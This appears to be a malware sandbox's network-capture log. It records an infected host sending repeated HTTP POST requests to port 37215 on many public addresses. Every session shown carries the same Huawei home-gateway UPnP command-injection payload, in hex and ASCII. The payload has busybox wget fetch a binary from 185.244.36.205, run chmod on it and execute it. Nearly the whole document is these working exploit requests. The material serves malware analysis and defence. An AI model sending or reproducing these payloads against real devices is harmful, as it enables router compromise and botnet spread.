                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2298192.168.2.1536356122.67.136.18437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466928959 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2299192.168.2.1533444121.3.159.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466974020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2300192.168.2.1539756156.37.232.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466999054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2301192.168.2.153363041.70.88.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467010021 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2302192.168.2.154861094.224.55.3737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467071056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2303192.168.2.154781241.68.47.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467123985 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2304192.168.2.155219445.187.172.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467133045 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2305192.168.2.1535428197.169.130.23337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467149019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2306192.168.2.1559108122.89.105.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467734098 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2307192.168.2.1539458156.144.78.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.467763901 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
